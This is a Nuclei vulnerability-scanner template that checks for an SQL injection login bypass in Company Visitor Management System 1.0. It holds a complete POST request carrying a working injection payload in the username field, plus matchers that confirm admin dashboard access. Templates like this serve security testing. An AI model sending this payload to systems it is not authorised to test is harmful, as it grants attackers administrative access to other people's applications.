nuclei-templates/vulnerabilities/other/cvms-sqli.yaml

39 lines
899 B
YAML

id: cvms-sqli
info:
name: Company Visitor Management System (CVMS) 1.0 - SQLi Authentication Bypass
author: arafatansari
severity: high
description: |
Company Visitor Management System Login page can be bypassed with a simple SQLi to the username parameter.
reference:
- https://www.exploit-db.com/exploits/48884
metadata:
verified: true
tags: cvms,sqli,auth-bypass,cms
requests:
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin%27+or+%271%27%3D%271%27%23&password=nuclei&login=
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Admin user'
- 'Dashboard'
- 'CVMS'
condition: and
- type: status
status:
- 200